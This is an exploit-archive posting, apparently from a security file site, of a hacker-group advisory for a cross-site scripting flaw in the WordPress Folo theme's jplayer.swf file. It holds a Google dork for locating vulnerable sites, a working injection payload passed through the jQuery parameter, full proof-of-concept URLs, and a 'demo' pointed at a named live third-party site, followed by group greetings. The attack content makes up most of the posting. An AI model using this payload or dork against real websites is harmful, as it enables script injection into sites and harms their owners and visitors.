WordPress Folo Theme Cross Site Scripting

WordPress Folo Theme Cross Site Scripting: Posted Nov 30, 2013; Authored by Darksnipper; WordPress Folo theme suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 6f6a0b653d47d002c0d96429481f77236becff3c3cf8a84c7c394b20619c5ffb; Download | Favorite | View

WordPress Folo Theme Cross Site Scripting

#####################################
Title:Wordpress Folo Theme xss Vulnerability
#####################
##############################################################

  __  __          _____  _      ______ ______ _______ _____
 |  \/  |   /\   |  __ \| |    |  ____|  ____|__   __/ ____|
 | \  / |  /  \  | |  | | |    | |__  | |__     | | | (___
 | |\/| | / /\ \ | |  | | |    |  __| |  __|    | |  \___ \
 | |  | |/ ____ \| |__| | |____| |____| |____   | |  ____) |
 |_|  |_/_/    \_\_____/|______|______|______|  |_| |_____/

##############################################################
#Author:Darksnipper

#Email:Darksnipper@live.com

#####################################
#Home:-  www.MadLeeTs.com
#####################################

#####################################
#Home:-  www.CyberCoderss.Blogspot.com
#####################################

Vendor Link:http://themify.me/themes/folo

Dork:-inurl:"inurl:/wp-content/themes/folo/"

Tested On:- Windows 7,Linux,Windows xp

######################################################################
#P.o.c

http: //127.0.0.1/wp-content/themes/folo/assets/js/jplayer.swf

payload

?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/MaDLeets/)//

Demo:-

krushlicious.com/wp-content/themes/folo/assets/js/jplayer.swf
payload:-
?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/MaDLeets/)//


Like:-

http://127.0.01/wp-content/themes/folo/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/MaDLeets/)//



########################################################################
Greetz:1337,Dream.killer,Soul~inj3ct0r,Force-Ex,x3o-1337,Shadow008,H4x0r
Hussy,H4x0rl1f3,Invectus,Sahrawi
Hacker,Madc0de  Haxor,Makman,Sniffer,Retno Pro, Tr4ck3r,b0x,Gujjar
Pcp,P4k Command3r,Pain006,Anon DeXter,
Ap3x Pr3d1at0r,Ment@l Mind,Evan Ricafort,Syndicate,Root Haxor,Kd
Divakar,r00X,,zHC Snipper,All Madleets Members,Kashmiri HackerS.
########################################################################

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 64 files
Debian 20 files
Apple 14 files
LiquidWorm 11 files
Gentoo 8 files
Google Security Research 4 files
Andrey Stoykov 3 files
Jann Horn 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,171)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,070)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,426)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,010)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

WordPress Folo Theme Cross Site Scripting

WordPress Folo Theme Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Folo Theme Cross Site Scripting

Share This

WordPress Folo Theme Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems